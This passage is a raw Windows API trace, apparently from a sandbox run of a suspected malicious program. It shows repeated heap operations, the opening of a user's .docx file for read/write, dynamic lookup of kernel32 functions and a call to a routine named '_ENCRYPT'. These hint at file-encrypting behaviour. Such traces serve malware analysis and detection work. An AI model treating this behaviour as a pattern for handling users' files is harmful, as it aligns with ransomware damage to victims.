lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.643] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0-mfkgr.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0168.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=53, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a) returned 0x906f38 [0168.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa6b008, cbMultiByte=53, lpWideCharStr=0x906f38, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.docx") returned 53 [0168.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0168.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0168.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0168.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0168.649] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0168.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0168.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.651] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0168.651] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0168.652] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0168.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.653] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0168.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0168.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.653] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0168.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.654] CloseHandle (hObject=0x120) returned 1 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0168.655] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.656] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.656] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0168.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.656] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.656] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 